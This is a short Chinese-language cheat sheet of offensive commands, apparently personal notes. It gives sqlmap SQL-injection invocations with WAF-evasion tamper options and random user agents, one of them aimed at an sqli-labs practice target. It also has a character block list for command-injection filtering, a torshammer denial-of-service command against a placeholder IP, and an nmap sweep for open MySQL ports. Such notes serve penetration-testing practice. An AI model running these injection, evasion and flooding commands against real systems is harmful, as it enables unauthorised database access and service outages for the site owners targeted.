sqlmap
sqlmap.py -r C:\Users\caiqiqi\Desktop\xxx\666 --level=5 --risk=3 --random-agent --dbms=mysql --tamper=space2comment -p "xxx" --skip user-agent
–random-agent,使用随机UA,避免默认sqlmap的UA被针对
–tampler, 绕waf
-p, 指定具体要注入的参数
–skip user-agent,指定某参数不做测试
参考:https://www.freebuf.com/news/196755.html
POST版
不止可以-r,然后指定参数,还可以
sqlmap -u "http://192.168.170.139/sqli-labs/Less-11/?id=1" --method POST --data "uname=Dhakkan&passwd=Dhakkan&submit=Submit" -p "uname,passwd" -v 2
其中指定多个参数用逗号隔开。
来源:http://carnal0wnage.attackresearch.com/2011/03/sqlmap-with-post-requests.html
命令执行,参考需要过滤的字符:
block_str = ['#', '&', ';', '`', '|', '*', '~', '<', '>', '^', '(', ')', '[', ']', '{', '}', '$', '
', '\'', '\"', '%','!',' ']
torshammer
python2 torshammer.py -t 1.2.3.4 -p 8362 -r 10000
扫描某个网段下开放某端口的IP
nmap 172.24.4.123/24 -Pn -p3306 --open|grep 172.24.4